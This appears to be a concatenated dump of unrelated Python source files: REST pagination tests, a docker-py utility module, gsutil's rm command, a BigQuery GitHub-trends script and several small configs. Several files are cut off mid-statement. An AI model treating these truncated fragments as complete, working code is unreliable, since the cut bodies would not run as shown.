TEST_DB_SUFFIX
)
)
routes = [
['/friends', Friends],
['/friends2', Friends2]
]
@asyncio.coroutine
def _create_friend(self, **kwargs):
defaults = dict(
name=self._random_string(),
meta=json.dumps(dict(name='name1', data2='data2'))
)
return(
yield from self._create_and_get('/friends', kwargs, defaults)
)
class TestAdvancedOptions(BaseTestCase):
@asyncio.coroutine
def _a_lot_of_friends(self):
# create a lot of friends
all_names = []
for i in range(100):
name = names.get_full_name()+str(i)
all_names.append(name)
_, f = yield from self._create_friend(name=name)
t = yield from _.text()
print(t)
assert _.status==201
_.close()
return all_names
@asynctest
def test_pagination(self):
yield from self._a_lot_of_friends()
# list with default values
# page 1
r = yield from self._get_json(self.full_url('/friends'))
assert r['data']['count'] >= 100
assert r['data']['prev'] == None
assert 'offset=20' in r['data']['next']
assert 'limit=20' in r['data']['next']
assert len(r['index']) == r['data']['length']
# page 2
r = yield from self._get_json(r['data']['next'])
assert 'offset=0' in r['data']['prev']
assert 'offset=40' in r['data']['next']
assert len(r['index']) == r['data']['length']
assert len(r['index'][0].keys()) == 2
@asynctest
def test_pagination_no_limit(self):
yield from self._a_lot_of_friends()
# list with no limit
r = yield from self._get_json(self.full_url('/friends?limit=0'))
assert r['data']['count'] >= 100
assert r['data']['prev'] == None
assert r['data']['next'] == None
assert r['data']['length'] == r['data']['count']
assert len(r['index']) == r['data']['count']
@asynctest
def test_search_pagination(self):
rnames = list((yield from self._a_lot_of_friends()))
rname = random.choice(rnames).split()[0]
for i in range(5):
name = '{} {}'.format(rname, names.get_last_name())
_, friend = yield from self._create_friend(name=name)
_.close()
rname = rname.lower()
r = yield from self._get_json(
self.full_url('/friends?search={}&limit=1'.format(rname))
)
assert r['data']['count'] >= 1
assert rname in r['data']['next']
while r['data']['next']:
r = yield from self._get_json(r['data']['next'])
if r['data']['next'] is not None:
assert rname in r['data']['next']
assert rname in r['data']['prev']
assert rname.lower() in r['index'][0]['name'].lower()
@asynctest
def test_order_by_ASC(self):
yield from self._a_lot_of_friends()
name = 'Abel Barrera'
_, friend = yield from self._create_friend(name=name)
_.close()
url = self.full_url('/friends?order_by={}'.format('name'))
resp = yield from self._get_json(url)
assert resp['index'][0]['name'].startswith('A')
@asynctest
def test_order_by_400(self):
yield from self._a_lot_of_friends()
url = self.full_url('/friends?order_by={}'.format('other'))
resp = yield from self._get(url)
assert resp.status == 400
@asynctest
def test_order_by_desc(self):
yield from self._a_lot_of_friends()
defaults = dict(
name='Zarahi zuna'
)
resp = yield from self._create('/friends', defaults)
assert resp.status == 201
resp.close()
url = self.full_url('/friends?order_by={}'.format('-name'))
resp = yield from self._get_json(url)
assert resp['index'][0]['name'].startswith('Z')
class TestBasic(BaseTestCase):
# Test common REST actions
@asynctest
def test_index(self):
resp = yield from self._get(self.full_url('/friends'))
assert resp.status == 200
resp.close()
@asynctest
def test_index_json(self):
resp = yield from self._index('/friends')
assert isinstance(resp, dict)
assert 'index' in resp
@asynctest
def test_index_json_condition(self):
resp = yield from self._index('/friends2')
assert isinstance(resp, dict)
assert 'index' in resp
@asynctest
def test_create(self):
name = self._random_string()
_, friend = yield from self._create_friend(name=name)
assert _.status == 201
_.close()
assert friend['name'] == name
assert len(friend.keys()) == 4
efriend = yield from self._delete(friend['url'])
assert efriend.status==200
@asynctest
def test_create_error(self):
_, friend = yield from self._create_friend(wrong_field=123)
assert _.status == 400
_.close()
@asynctest
def test_create_conflict(self):
name = names.get_full_name()
_, friend = yield from self._create_friend(name=name)
_.close()
_, friend = yield from self._create_friend(name=name)
assert _.status == 409
_.close()
@asynctest
def test_update(self):
_, friend = yield from self._create_friend()
_.close()
new_name = self._random_string()
presp = yield from self._patch(friend['url'], name=new_name)
assert presp.status == 204
presp.close()
updated_friend = yield from self._get_json(friend['url'])
assert updated_friend['body']['name'] == new_name
@asynctest
def test_search(self):
name = 'some known name'
_, friend = yield from self._create_friend(name=name)
_.close()
results = yield from self._search('/friends', terms='known name')
assert len(results['index']) > 0
assert results['index'][0]['name'] == name
@asynctest
def test_view_404(self):
resp = yield from self._get(self.full_url('/friends/999999'))
assert resp.status == 404
resp.close()
@asynctest
def test_update_400(self):
_, friend = yield from self._create_friend()
_.close()
new_name = self._random_string()
presp = yield from self._patch(friend['url'], names=new_name)
assert presp.status == 400
presp.close()
@asynctest
def test_update_empty_required_400(self):
_, friend = yield from self._create_friend()
_
klahnakoski/esReplicate | pyLibrary/queries/es09/expressions.py | Python | mpl-2.0 | 26,115 | 0.003178
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from collections import Mapping
from datetime import datetime
import re
from pyLibrary import convert
from mo_collections import reverse
from mo_logs import Log
from mo_logs.strings import quote
from mo_math import Math
from mo_dots import split_field, Data, Null, join_field, coalesce, listwrap
from mo_times.durations import Duration
class _MVEL(object):
def __init__(self, fromData, isLean=False):
self.fromData = fromData
self.isLean = isLean
self.prefixMap = []
self.functions = {}
def code(self, query):
"""
RETURN THE MVEL THAT WILL FILTER USING query.where AND TERM-PACK THE query.select CLAUSE
"""
selectList = listwrap(query.select)
fromPath = query.frum.name # FIRST NAME IS THE INDEX
sourceVar = "__sourcedoc__"
whereClause = query.where
# PARSE THE fromPath
code = self.frum(fromPath, sourceVar, "__loop")
select = self.select(selectList, fromPath, "output", sourceVar)
body = "var output = \"\";\n" + \
code.replace(
"<CODE>",
"if (" + _where(whereClause, lambda(v): self._translate(v)) + "){\n" +
select.body +
"}\n"
) + \
"output\n"
# ADD REFERENCED CONTEXT VARIABLES
context = self.getFrameVariables(body)
func = UID()
predef = addFunctions(select.head+context+body).head
param = "_source" if body.find(sourceVar) else ""
output = predef + \
select.head + \
context + \
'var ' + func + ' = function('+sourceVar+'){\n' + \
body + \
'};\n' + \
func + '('+param+')\n'
return Compiled(output)
def frum(self, fromPath, sourceVar, loopVariablePrefix):
"""
indexName NAME USED TO REFER TO HIGH LEVEL DOCUMENT
loopVariablePrefix PREFIX FOR LOOP VARIABLES
"""
loopCode = "if (<PATH> != null){ for(<VAR> : <PATH>){\n<CODE>\n}}\n"
self.prefixMap = []
code = "<CODE>"
path = split_field(fromPath)
# ADD LOCAL VARIABLES
columns = INDEX_CACHE[path[0]].columns
for i, c in enumerate(columns):
if c.name.find("\\.") >= 0:
self.prefixMap.insert(0, {
"path": c.name,
"variable": "get(" + sourceVar + ", \"" + c.name.replace("\\.", ".") + "\")"
})
else:
self.prefixMap.insert(0, {
"path": c.name,
"variable": sourceVar + ".?" + c.name
})
# ADD LOOP VARIABLES
currPath = []
# self.prefixMap.insert(0, {"path": path[0], "variable": path[0]})
for i, step in enumerate(path[1::]):
loopVariable = loopVariablePrefix + str(i)
currPath.append(step)
pathi = ".".join(currPath)
shortPath = self._translate(pathi)
self.prefixMap.insert(0, {"path": pathi, "variable": loopVariable})
loop = loopCode.replace("<VAR>", loopVariable).replace("<PATH>", shortPath)
code = code.replace("<CODE>", loop)
return code
def _translate(self, variableName):
shortForm = variableName
for p in self.prefixMap:
prefix = p["path"]
if shortForm == prefix:
shortForm = p["variable"]
else:
shortForm = replacePrefix(shortForm, prefix + ".", p["variable"] + ".?") # ADD NULL CHECK
shortForm = replacePrefix(shortForm, prefix + "[", p["variable"] + "[")
return shortForm
# CREATE A PIPE DELIMITED RESULT SET
def select(self, selectList, fromPath, varName, sourceVar):
path = split_field(fromPath)
is_deep = len(path) > 1
heads = []
list = []
for s in selectList:
if is_deep:
if s.value and isKeyword(s.value):
shortForm = self._translate(s.value)
list.append("Value2Pipe(" + shortForm + ")\n")
else:
Log.error("do not know how to handle yet")
else:
if s.value and isKeyword(s.value):
list.append("Value2Pipe(getDocValue(" + value2MVEL(s.value) + "))\n")
elif s.value:
shortForm = self._translate(s.value)
list.append("Value2Pipe(" + shortForm + ")\n")
else:
code, decode = self.Parts2Term(s.domain)
heads.append(code.head)
list.append("Value2Pipe(" + code.body + ")\n")
if len(split_field(fromPath)) > 1:
output = 'if (' + varName + ' != "") ' + varName + '+="|";\n' + varName + '+=' + '+"|"+'.join(["Value2Pipe("+v+")\n" for v in list]) + ';\n'
else:
output = varName + ' = ' + '+"|"+'.join(["Value2Pipe("+v+")\n" for v in list]) + ';\n'
return Data(
head="".join(heads),
body=output
)
def Parts2Term(self, domain):
"""
TERMS ARE ALWAYS ESCAPED SO THEY CAN BE COMPOUNDED WITH PIPE (|)
CONVERT AN ARRAY OF PARTS{name, esfilter} TO AN MVEL EXPRESSION
RETURN expression, function PAIR, WHERE
expression - MVEL EXPRESSION
function - TAKES RESULT OF expression AND RETURNS PART
"""
fields = domain.dimension.fields
term = []
if len(split_field(self.fromData.name)) == 1 and fields:
if isinstance(fields, Mapping):
# CONVERT UNORDERED FIELD DEFS
jx_fields, es_fields = zip(*[(k, fields[k]) for k in sorted(fields.keys())])
else:
jx_fields, es_fields = zip(*[(i, e) for i, e in enumerate(fields)])
# NO LOOPS BECAUSE QUERY IS SHALLOW
# DOMAIN IS FROM A DIMENSION, USE IT'S FIELD DEFS TO PULL
if len(es_fields) == 1:
def fromTerm(term):
return domain.getPartByKey(term)
return Data(
head="",
body='getDocValue('+quote(domain.dimension.fields[0])+')'
), fromTerm
else:
def fromTerm(term):
terms = [convert.pipe2value(t) for t in convert.pipe2value(term).split("|")]
candidate = dict(zip(jx_fields, terms))
for p in domain.partitions:
for k, t in candidate.items():
if p.value[k] != t:
break
else:
return p
if domain.type in ["uid", "default"]:
part = {"value": candidate}
domain.partitions.append(part)
return part
else:
return Null
for f in es_fields:
term.append('Value2Pipe(getDocValue('+quote(f)+'))')
return Data(
head="",
body='Value2Pipe('+('+"|"+'.join(term))+')'
), fromTerm
else:
for v in domain.partitions:
term.append("if (" + _where(v.esfilter, lambda x: self._translate(x)) + ") " + value2MVEL(domain.getKey(v)) + "; else ")
term.append(value2MVEL(domain.getKey(domain.NULL)))
func_name = "_temp"+UID()
return self.register_function("+\"|\"+".join(term))
def Parts2TermScript(self, domain):
code, decode = self.Parts2Term(domain)
func = addF
mirskytech/djangocms-carousel | setup.py | Python | bsd-3-clause | 1,241 | 0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
from djangocms_carousel import __version__
INSTALL_REQUIRES = [
]
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Communications',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content :: Message Boards',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
]
setup(
name='djangocms-carousel',
version=__version__,
description='Slider Plugin for django CMS',
author='Andrew Mirsky',
author_email='andrew@mirsky.net',
url='https://git.mirsky.net/mirskyconsulting/djangocms-carousel',
packages=['djangocms_carousel', 'djangocms_carousel.migrations'],
install_requires=INSTALL_REQUIRES,
license='LICENSE.txt',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
long_description=open('README.md').read(),
include_package_data=True,
zip_safe=False
)
Novasoft-India/OperERP-AM-Motors | openerp/addons/giicourse/__openerp__.py | Python | agpl-3.0 | 444 | 0.018018
{
"name" : "
|
GII",
"version" : "1.0",
"depends" : ['sale','product'],
"author" : "Novasoft Consultancy Services Pvt. Ltd.",
'category' : 'Generic Modules/Others',
"description": """ GII - Management Module
""",
'website': 'http://www.novasoftindia.com',
'data': ['giisa.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
'application': True,
}
bfirsh/docker-py | docker/utils/utils.py | Python | mit | 39,231 | 0.000051
import base64
import io
import os
import os.path
import json
import shlex
import sys
import tarfile
import tempfile
import warnings
from distutils.version import StrictVersion
from datetime import datetime
from fnmatch import fnmatch
import requests
import six
from .. import constants
from .. import errors
from .. import tls
from ..types import Ulimit, LogConfig, Healthcheck
if six.PY2:
from urllib import splitnport
else:
from urllib.parse import splitnport
DEFAULT_HTTP_HOST = "127.0.0.1"
DEFAULT_UNIX_SOCKET = "http+unix://var/run/docker.sock"
DEFAULT_NPIPE = 'npipe:////./pipe/docker_engine'
BYTE_UNITS = {
'b': 1,
'k': 1024,
'm': 1024 * 1024,
'g': 1024 * 1024 * 1024
}
def create_ipam_pool(subnet=None, iprange=None, gateway=None,
aux_addresses=None):
"""
Create an IPAM pool config dictionary to be added to the
``pool_configs`` parameter of
:py:meth:`~docker.utils.create_ipam_config`.
Args:
subnet (str): Custom subnet for this IPAM pool using the CIDR
notation. Defaults to ``None``.
iprange (str): Custom IP range for endpoints in this IPAM pool using
the CIDR notation. Defaults to ``None``.
gateway (str): Custom IP address for the pool's gateway.
aux_addresses (dict): A dictionary of ``key -> ip_address``
relationships specifying auxiliary addresses that need to be
allocated by the IPAM driver.
Returns:
(dict) An IPAM pool config
Example:
>>> ipam_pool = docker.utils.create_ipam_pool(
subnet='124.42.0.0/16',
iprange='124.42.0.0/24',
gateway='124.42.0.254',
aux_addresses={
'reserved1': '124.42.1.1'
}
)
>>> ipam_config = docker.utils.create_ipam_config(
pool_configs=[ipam_pool])
"""
return {
'Subnet': subnet,
'IPRange': iprange,
'Gateway': gateway,
'AuxiliaryAddresses': aux_addresses
}
def create_ipam_config(driver='default', pool_configs=None):
"""
Create an IPAM (IP Address Management) config dictionary to be used with
:py:meth:`~docker.api.network.NetworkApiMixin.create_network`.
Args:
driver (str): The IPAM driver to use. Defaults to ``default``.
pool_configs (list): A list of pool configuration dictionaries as
created by :py:meth:`~docker.utils.create_ipam_pool`. Defaults to
empty list.
Returns:
(dict) An IPAM config.
Example:
>>> ipam_config = docker.utils.create_ipam_config(driver='default')
>>> network = client.create_network('network1', ipam=ipam_config)
"""
return {
'Driver': driver,
'Config': pool_configs or []
}
def mkbuildcontext(dockerfile):
f = tempfile.NamedTemporaryFile()
t = tarfile.open(mode='w', fileobj=f)
if isinstance(dockerfile, io.StringIO):
dfinfo = tarfile.TarInfo('Dockerfile')
if six.PY3:
raise TypeError('Please use io.BytesIO to create in-memory '
'Dockerfiles with Python 3')
else:
dfinfo.size = len(dockerfile.getvalue())
dockerfile.seek(0)
elif isinstance(dockerfile, io.BytesIO):
dfinfo = tarfile.TarInfo('Dockerfile')
dfinfo.size = len(dockerfile.getvalue())
dockerfile.seek(0)
else:
dfinfo = t.gettarinfo(fileobj=dockerfile, arcname='Dockerfile')
t.addfile(dfinfo, dockerfile)
t.close()
f.seek(0)
return f
def decode_json_header(header):
data = base64.b64decode(header)
if six.PY3:
data = data.decode('utf-8')
return json.loads(data)
def tar(path, exclude=None, dockerfile=None, fileobj=None, gzip=False):
if not fileobj:
fileobj = tempfile.NamedTemporaryFile()
t = tarfile.open(mode='w:gz' if gzip else 'w', fileobj=fileobj)
root = os.path.abspath(path)
exclude = exclude or []
for path in sorted(exclude_paths(root, exclude, dockerfile=dockerfile)):
i = t.gettarinfo(os.path.join(root, path), arcname=path)
if sys.platform == 'win32':
# Windows doesn't keep track of the execute bit, so we make files
# and directories executable by default.
i.mode = i.mode & 0o755 | 0o111
try:
# We open the file object in binary mode for Windows support.
f = open(os.path.join(root, path), 'rb')
except IOError:
# When we encounter a directory the file object is set to None.
f = None
t.addfile(i, f)
t.close()
fileobj.seek(0)
return fileobj
def exclude_paths(root, patterns, dockerfile=None):
"""
Given a root directory path and a list of .dockerignore patterns, return
an iterator of all paths (both regular files and directories) in the root
directory that do *not* match any of the patterns.
All paths returned are relative to the root.
"""
if dockerfile is None:
dockerfile = 'Dockerfile'
exceptions = [p for p in patterns if p.startswith('!')]
include_patterns = [p[1:] for p in exceptions]
include_patterns += [dockerfile, '.dockerignore']
exclude_patterns = list(set(patterns) - set(exceptions))
paths = get_paths(root, exclude_patterns, include_patterns,
has_exceptions=len(exceptions) > 0)
return set(paths).union(
# If the Dockerfile is in a subdirectory that is excluded, get_paths
# will not descend into it and the file will be skipped. This ensures
# it doesn't happen.
set([dockerfile])
if os.path.exists(os.path.join(root, dockerfile)) else set()
)
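# Usage sketch (added; hypothetical .dockerignore-style patterns):
#   exclude_paths('/src/app', ['*.pyc', '!keep.pyc'])
# yields every path under /src/app except *.pyc files, while keep.pyc,
# the Dockerfile and .dockerignore are always retained.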
def should_include(path, exclude_patterns, include_patterns):
"""
Given a path, a list of exclude patterns, and a list of inclusion patterns:
1. Returns True if the path doesn't match any exclusion pattern
2. Returns False if the path matches an exclusion pattern and doesn't match
an inclusion pattern
3. Returns true if the path matches an exclusion pattern and matches an
inclusion pattern
"""
for pattern in exclude_patterns:
if match_path(path, pattern):
for pattern in include_patterns:
if match_path(path, pattern):
return True
return False
return True
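# Worked examples of the three rules above (added; hypothetical paths and
# patterns, assuming the fnmatch-style matching of match_path below):
#   should_include('docs/notes.md', ['docs/*'], [])             -> False (rule 2)
#   should_include('docs/notes.md', ['docs/*'], ['docs/*.md'])  -> True  (rule 3)
#   should_include('src/app.py',    ['docs/*'], [])             -> True  (rule 1)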
def get_paths(root, exclude_patterns, include_patterns, has_exceptions=False):
paths = []
for parent, dirs, files in os.walk(root, topdown=True, followlinks=False):
parent = os.path.relpath(parent, root)
if parent == '.':
parent = ''
# If exception rules exist, we can't skip recursing into ignored
# directories, as we need to look for exceptions in them.
#
# It may be possible to optimize this further for exception patterns
# that *couldn't* match within ignored directories.
#
# This matches the current docker logic (as of 2015-11-24):
# https://github.com/docker/docker/blob/37ba67bf636b34dc5c0c0265d62a089d0492088f/pkg/archive/archive.go#L555-L557
if not has_exceptions:
# Remove excluded patterns from the list of directories to traverse
# by mutating the dirs we're iterating over.
# This looks strange, but is considered the correct way to skip
# traversal. See https://docs.python.org/2/library/os.html#os.walk
dirs[:] = [d for d in dirs if
should_include(os.path.join(parent, d),
exclude_patterns, include_patterns)]
for path in dirs:
if should_include(os.path.join(parent, path),
exclude_patterns, include_patterns):
paths.append(os.path.join(parent, path))
for path in files:
if should_include(os.path.join(parent, path),
exclude_patterns, include_patterns):
paths.append(os.path.join(parent, path))
return paths
def match_path(path, patter
openstates/openstates | openstates/vi/legislators.py | Python | gpl-3.0 | 490 | 0.002041
from pupa.scrape import Person, Scraper
from openstates.utils import LXMLMixin
class VIPersonScraper(Scraper, LXMLMixin):
def scrape(self, chamber, term):
pass
yield Person()
# home_url = 'http://www.legvi.org/'
# doc = lxml.html.fromstring(self.get(url=home_url).text)
# USVI offers name, island, and biography, but contact info is locked up in a PDF
# //*[@id="sp-main-menu"]/ul/li[2]/div/div/div/div/ul/li/div/div/ul/li/a/span/span
Locu/chronology | pykronos/tests/conf/django_settings.py | Python | mit | 149 | 0
KRONOS_MIDDLEWARE = {
'host': 'http://localhost:9191/',
'stream': 'django_middleware',
'blocking': True,
'log_exception_stack_trace': True
}
harishvc/tools | bigquery-github/TopGithubRepos.py | Python | mit | 4,367 | 0.0158
# Query Github public timeline using Bigquery and display top new repositories
# Modified from sources
## https://developers.google.com/bigquery/bigquery-api-quickstart#completecode
## https://gist.github.com/igrigorik/f8742314320e0a4b1a89
import httplib2
import pprint
import sys
import time
import json
import logging
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient import errors
from pprint import pprint
from oauth2client.client import SignedJwtAssertionCredentials
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run
#Debug
# https://developers.google.com/api-client-library/python/guide/logging
#httplib2.debuglevel = 4
#logger = logging.getLogger()
#logger.setLevel(logging.INFO)
def main():
PROJECT_NUMBER = 'xxx' #TODO: Add project number
SERVICE_ACCOUNT_EMAIL = 'xxx@developer.gserviceaccount.com' #TODO: Add service account
f = file('xxx-key.p12', 'rb') #TODO: Add key
key = f.read()
f.close()
credentials = SignedJwtAssertionCredentials(
SERVICE_ACCOUNT_EMAIL,
key,
scope='https://www.googleapis.com/auth/bigquery.readonly')
http = httplib2.Http()
http = credentials.authorize(http)
bigquery_service = build('bigquery', 'v2', http=http)
#https://developers.google.com/bigquery/docs/reference/v2/jobs/query
#https://code.google.com/p/python-sqlparse/
#http://sqlformat.org/
#TODO: Change timestamp
try:
query_request = bigquery_service.jobs()
query_data = {
"kind": "bigquery#job",
'query': 'SELECT repository_url, repository_language, COUNT(repository_name) AS cnt, \
FROM githubarchive:github.timeline \
WHERE TYPE="WatchEvent" \
AND PARSE_UTC_USEC(created_at) >= PARSE_UTC_USEC("2014-08-15 00:00:00") \
AND repository_url IN \
(SELECT repository_url \
FROM githubarchive:github.timeline \
WHERE TYPE="CreateEvent" \
AND PARSE_UTC_USEC(repository_created_at) >= PARSE_UTC_USEC("2014-08-15 00:00:00") \
AND repository_fork = "false" \
AND payload_ref_type = "repository" \
GROUP BY repository_url) \
GROUP BY repository_name, \
repository_language, \
repository_description, \
repository_url HAVING cnt >= 5 \
ORDER BY cnt DESC LIMIT 5;',
"useQueryCache": "False" # True or False
}
#Trigger on-demand query
#Quota & Policy info https://developers.google.com/bigquery/quota-policy
query_response = query_request.query(projectId=PROJECT_NUMBER, body=query_data).execute()
#Did the bigquery get processed?
if ((query_response['jobComplete']) and (int(query_response['totalRows']) >1) and (int(query_response['totalBytesProcessed']) > 0 )):
#Store result for further analysis
with open( 'toprepositories.json', 'w' ) as outfile:
json.dump( query_response,outfile)
#Print results
print "Top Repositories in Github"
for row in query_response['rows']:
result_row = []
for field in row['f']:
result_row.append(field['v'])
print('\t'.join(map(str,result_row)))
else:
print "Ignore: jobComplete=%s \t totalRows=%s \t totalBytesProcessed=%s" % (query_response['jobComplete'],query_response['totalRows'], query_response['totalBytesProcessed'])
except HttpError as err:
print "Error:", pprint(err.content)
except AccessTokenRefreshError:
print "Token Error: Credentials have been revoked or expired"
if __name__ == '__main__':
main()
|
fishjord/gsutil
|
gslib/commands/rm.py
|
Python
|
apache-2.0
| 15,054 | 0.004849 |
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like rm command for cloud storage providers."""
from __future__ import absolute_import
import time
from gslib.cloud_api import BucketNotFoundException
from gslib.cloud_api import NotEmptyException
from gslib.cloud_api import NotFoundException
from gslib.cloud_api import ServiceException
from gslib.command import Command
from gslib.command import DecrementFailureCount
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.exception import NO_URLS_MATCHED_GENERIC
from gslib.exception import NO_URLS_MATCHED_TARGET
from gslib.name_expansion import NameExpansionIterator
from gslib.name_expansion import SeekAheadNameExpansionIterator
from gslib.parallelism_framework_util import PutToQueueWithTimeout
from gslib.storage_url import StorageUrlFromString
from gslib.thread_message import MetadataMessage
from gslib.translation_helper import PreconditionsFromHeaders
from gslib.util import GetCloudApiInstance
from gslib.util import NO_MAX
from gslib.util import Retry
from gslib.util import StdinIterator
_SYNOPSIS = """
gsutil rm [-f] [-r] url...
gsutil rm [-f] [-r] -I
"""
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
""" + _SYNOPSIS + """
<B>DESCRIPTION</B>
The gsutil rm command removes objects.
For example, the command:
gsutil rm gs://bucket/subdir/*
will remove all objects in gs://bucket/subdir, but not in any of its
sub-directories. In contrast:
gsutil rm gs://bucket/subdir/**
will remove all objects under gs://bucket/subdir or any of its
subdirectories.
You can also use the -r option to specify recursive object deletion. Thus, for
example, either of the following two commands will remove gs://bucket/subdir
and all objects and subdirectories under it:
gsutil rm gs://bucket/subdir**
gsutil rm -r gs://bucket/subdir
The -r option will also delete all object versions in the subdirectory for
versioning-enabled buckets, whereas the ** command will only delete the live
version of each object in the subdirectory.
Running gsutil rm -r on a bucket will delete all versions of all objects in
the bucket, and then delete the bucket:
gsutil rm -r gs://bucket
If you want to delete all objects in the bucket, but not the bucket itself,
this command will work:
gsutil rm gs://bucket/**
If you have a large number of objects to remove you might want to use the
gsutil -m option, to perform parallel (multi-threaded/multi-processing)
removes:
gsutil -m rm -r gs://my_bucket/subdir
You can pass a list of URLs (one per line) to remove on stdin instead of as
command line arguments by using the -I option. This allows you to use gsutil
in a pipeline to remove objects identified by a program, such as:
some_program | gsutil -m rm -I
The contents of stdin can name cloud URLs and wildcards of cloud URLs.
Note that gsutil rm will refuse to remove files from the local
file system. For example this will fail:
gsutil rm *.txt
WARNING: Object removal cannot be undone. Google Cloud Storage is designed
to give developers a high amount of flexibility and control over their data,
and Google maintains strict controls over the processing and purging of
deleted data. To protect yourself from mistakes, you can configure object
versioning on your bucket(s). See 'gsutil help versions' for details.
<B>DATA RESTORATION FROM ACCIDENTAL DELETION OR OVERWRITES</B>
Google Cloud Storage does not provide support for restoring data lost
or overwritten due to customer errors. If you have concerns that your
application software (or your users) may at some point erroneously delete or
overwrite data, you can protect yourself from that risk by enabling Object
Versioning (see "gsutil help versioning"). Doing so increases storage costs,
which can be partially mitigated by configuring Lifecycle Management to delete
older object versions (see "gsutil help lifecycle").
<B>OPTIONS</B>
-f Continues silently (without printing error messages) despite
errors when removing multiple objects. If some of the objects
could not be removed, gsutil's exit status will be non-zero even
if this flag is set. Execution will still halt if an inaccessible
bucket is encountered. This option is implicitly set when running
"gsutil -m rm ...".
-I Causes gsutil to read the list of objects to remove from stdin.
This allows you to run a program that generates the list of
objects to remove.
-R, -r The -R and -r options are synonymous. Causes bucket or bucket
subdirectory contents (all objects and subdirectories that it
contains) to be removed recursively. If used with a bucket-only
URL (like gs://bucket), after deleting objects and subdirectories
gsutil will delete the bucket. This option implies the -a option
and will delete all object versions.
-a Delete all versions of an object.
""")
def _RemoveExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
if not cls.continue_on_error:
cls.logger.error(str(e))
# TODO: Use shared state to track missing bucket names when we get a
# BucketNotFoundException. Then improve bucket removal logic and exception
# messages.
if isinstance(e, BucketNotFoundException):
cls.bucket_not_found_count += 1
cls.logger.error(str(e))
else:
if _ExceptionMatchesBucketToDelete(cls.bucket_strings_to_delete, e):
DecrementFailureCount()
else:
cls.op_failure_count += 1
# pylint: disable=unused-argument
def _RemoveFoldersExceptionHandler(cls, e):
"""When removing folders, we don't mind if none exist."""
if ((isinstance(e, CommandException) and
NO_URLS_MATCHED_GENERIC in e.reason)
or isinstance(e, NotFoundException)):
DecrementFailureCount()
else:
raise e
def _RemoveFuncWrapper(cls, name_expansion_result, thread_state=None):
cls.RemoveFunc(name_expansion_result, thread_state=thread_state)
def _ExceptionMatchesBucketToDelete(bucket_strings_to_delete, e):
"""Returns True if the exception matches a bucket slated for deletion.
A recursive delete call on an empty bucket will raise an exception when
  listing its objects, but if we plan to delete the bucket that shouldn't
result in a user-visible error.
Args:
bucket_strings_to_delete: Buckets slated for recursive deletion.
e: Exception to check.
Returns:
True if the exception was a no-URLs-matched exception and it matched
one of bucket_strings_to_delete, None otherwise.
"""
if bucket_strings_to_delete:
msg = NO_URLS_MATCHED_TARGET % ''
    if msg in str(e):
parts = str(e).split(msg)
return len(parts) == 2 and parts[1] in bucket_strings_to_delete
class RmCommand(Command):
"""Implementation of gsutil rm command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'rm',
command_name_aliases=['del', 'delete', 'remove'],
usage_synopsis=_SYNOPSIS,
min_args=0,
max_args=NO_MAX,
supported_sub_args='afIrR',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudURLsArgument()
|
adaptive-learning/proso-apps
|
proso_common/management/commands/load_global_custom_config.py
|
Python
|
mit
| 1,269 | 0 |
from django.conf import settings
from django.core.management.base import BaseCommand
from proso_common.models import CustomConfig
import os.path
import yaml
from django.db import transaction
from optparse import make_option
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option(
'-f',
'--file',
            dest='filename',
            default=os.path.join(settings.BASE_DIR, 'proso_custom_config.yaml')
        ),
    )
def handle(self, *args, **options):
with transaction.atomic():
CustomConfig.objects.filter(user_id=None).delete()
with open(options['filename'], 'r', encoding='utf8') as f:
for app_name, keys in yaml.load(f).items():
for key, records in keys.items():
for record in records:
CustomConfig.objects.try_create(
app_name,
key,
record['value'],
user_id=None,
condition_key=record['condition_key'],
condition_value=record['condition_value']
)
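# Illustrative shape of the YAML file handle() above expects (hypothetical
# values, not shipped with the repo): app name -> key -> list of records.
#
#   my_app:
#       difficulty:
#           - value: 42
#             condition_key: practice_filter
#             condition_value: category/world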
|
boriel/zxbasic
|
src/api/debug.py
|
Python
|
gpl-3.0
| 810 | 0.001235 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:et:
# Simple debugging module
import os
import inspect
from .config import OPTIONS
__all__ = ["__DEBUG__", "__LINE__", "__FILE__"]
# --------------------- END OF GLOBAL FLAGS ---------------------
def __DEBUG__(msg, level=1):
if level > OPTIONS.debug_level:
return
line = inspect.getouterframes(inspect.currentframe())[1][2]
fname = os.path.basename(inspect.getouterframes(inspect.currentframe())[1][1])
OPTIONS.stderr.write("debug: %s:%i %s\n" % (fname, line, msg))
def __LINE__():
